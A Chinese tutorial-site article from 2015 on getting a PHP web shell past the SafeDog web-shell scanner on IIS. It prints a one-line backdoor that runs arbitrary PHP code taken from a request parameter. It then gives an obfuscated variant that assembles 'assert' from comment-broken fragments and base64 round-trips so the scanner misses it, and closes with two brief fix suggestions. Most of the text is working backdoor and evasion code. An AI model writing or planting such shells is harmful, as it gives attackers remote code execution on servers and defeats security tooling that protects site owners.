网站地图    收藏   

主页 > 后端 > 网站安全 >

奇淫巧技绕过安全狗webshell查杀及修复建议 - 网站

来源:自学PHP网    时间:2015-04-16 23:15 作者: 阅读:

[导读] 测试环境:windows2003安全狗版本:iis3 3最新版原形?php assert($_REQUEST[AG]);?处理掉assert的函数原形即可绕过?php $jm= 39;MQ== 39;;$s=base64_decode($jm);$a=a *- *-* ss *- *-* er *-...

测试环境:windows2003


 

安全狗版本:iis3.3最新版



原形

<?php assert($_REQUEST["AG"]);?>

 

1.png



处理掉assert的函数原形即可绕过
 

<?php 

$jm='MQ==';

$s=base64_decode($jm);

$a="a"./*-/*-*/"ss"./*-/*-*/"er"./*-/*-*/"t";

$b=base64_encode($a); 

$c=base64_decode($b);

$c($_REQUEST[$s]);

?>


 

2.png

 

修复方案:

#1.增加相应的查杀库

#2.用正则过滤掉垃圾字符再用特征库识别效果会好一些

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论